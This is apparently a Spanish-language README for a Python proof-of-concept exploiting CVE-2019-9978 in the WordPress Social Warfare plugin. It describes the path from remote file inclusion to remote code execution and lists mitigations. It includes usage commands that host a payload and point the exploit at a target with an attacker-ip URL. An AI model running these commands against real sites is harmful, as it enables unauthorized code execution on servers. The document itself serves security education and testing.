
Una prueba de concepto personalizada en Python que muestra el análisis de causa raíz y la explotación de CVE 2019-9978 (plugin Social Warfare), centrándose en el flujo práctico de ataque de RFI a RCE.
Este repositorio contiene una Prueba de Concepto (PoC) basada en Python que demuestra la explotación de CVE-2019-9978, una vulnerabilidad crítica en el plugin Social Warfare de WordPress.
La vulnerabilidad permite a un atacante no autenticado realizar una Inclusión Remota de Archivos (RFI), que puede escalarse a Ejecución Remota de Código (RCE)* al alojar un payload malicioso en un servidor controlado por el atacante.
Este PoC fue desarrollado y probado en un entorno de laboratorio WordPress controlado únicamente con fines educativos y de pruebas de seguridad autorizadas.
El plugin Social Warfare no valida ni sanea adecuadamente la entrada proporcionada por el usuario utilizada para la inclusión remota de contenido.
Como resultado, un atacante puede proporcionar una URL externa maliciosa, lo que conduce a una inclusión remota de archivos no autenticada.
Cuando el archivo remoto incluido contiene código PHP ejecutable, se ejecuta en el contexto del servidor WordPress, lo que resulta en ejecución remota de código.
Unauthenticated HTTP Request
↓
Remote File Inclusion (External URL)
↓
Malicious Payload Execution
↓
Remote Code Execution (RCE)
python3 -m http.server 8000
Coloque su archivo de payload (por ejemplo, payload-main.txt) en el directorio del servidor.
python3 exploit.py <target-site.com> http://attacker-ip:8000/payload-main.txt
Actualizar el plugin Social Warfare a una versión parcheada
Deshabilitar la inclusión remota de archivos:
allow_url_include = Off
Restringir el manejo de URL externas en los plugins de WordPress
Implementar un Firewall de Aplicaciones Web (WAF) con reglas de detección de RFI
Este proyecto está destinado únicamente a fines educativos y pruebas de seguridad autorizadas.
NO utilice esta Prueba de Concepto contra sistemas sin permiso explícito. El autor no es responsable de ningún uso indebido o daño causado por esta herramienta.